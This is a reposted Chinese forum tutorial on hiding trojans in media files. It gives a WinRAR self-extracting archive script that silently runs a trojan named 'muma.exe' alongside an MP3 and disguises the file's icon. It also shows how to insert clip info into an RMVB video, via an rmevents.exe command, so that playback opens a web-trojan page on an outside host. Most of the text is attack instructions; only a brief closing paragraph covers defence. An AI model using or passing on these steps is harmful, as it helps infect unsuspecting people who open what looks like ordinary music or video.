[转帖]理论上来说可以,但视频文件与MP3文件由于大小太大,不适合捆绑木马。(捆绑木马后文件变成可执行文件,并先解压后才运行,解压时间很长。)
目前一般不采用捆绑法,而是通过在RMVB文件中添加剪辑信息来访问网页木马。
(这种方法处理后的文件依然是视频文件,无需解压便可运行。)
下面具体介绍这两种途径:
1、捆绑法
要求计算机安装WINRAR
准备好MP3文件和木马,选中这两个文件,点右键,选择“添加到压缩文件”
选择压缩方式为“存储”(解压速度较快),选择“创建自解压格式的文件”,
单击“注释”选项卡,假定你的MP3文件名为“123.mp3”,木马名为“MUMA.EXE”,那么你需要在注释中写入以下内容:
path=%systemroot%
savepath
Setup=muma.exe
setup=123.mp3
Silent=1
Overwrite=1
单击确定,产生一个压缩文件。
当运行这个文件时,会在你的系统目录下解压出这两个文件,并先后运行muma.exe与123.mp3
此文件图标为自解压文件图标,要想改动图标,请对此文件单击右键,选择“用WINRAR打开”,选择“高级自解压选项”,单击“文本和图标”选项卡,在“从文件选择自解压文件的图标”旁边的“浏览”按钮上单击,选择你喜欢的图标。
2、添加剪辑信息法:
(此资料来自
http://zhidao.baidu.com/question/55615502.html)
步骤一:准备网页木马
首先需要准备一个网页木马,具体方法请自行搜索学习。
这里假设网页木马地址为“
http://www.binghewu.com.cn/muma.html”。
步骤二:制作媒体信息文件
通过向RMVB影片中添加剪辑信息,可在视频播放时打开指定的木马网页。用记事本新建一个文本文件“muma.txt”,文件内容为:“u 00:01:00 00:01:00
http://www.binghewu.com.cn/muma.html”,表示视频播放到1分钟时就自动打开指定的网页木马页面。
步骤三:将网页木马加入RMVB视频
下载安装“HelixProducerPlus9”程序,打开一个命令提示符窗口,执行如下命令即可将网页木马加入指定的RM视频中(如图1):
“"C
rogram FilesRealHelix Producer PlusRealMediaEditor
mevents.exe" -i c:龙虎门.rmvb -e xinxi.txt -o C:龙虎门2.rmvb”
对两种方法的防范:
捆绑法:捆绑后的文件变为可执行文件。因此只要检查文件的后缀名,如果不是.MP3,而显示音乐文件的图标,就不要执行。一般,从网上下载的.EXE文件都要小心,不要轻易执行。
添加剪辑信息法:目前有工具可以删除影片中的剪辑信息,请自行搜索、下载。
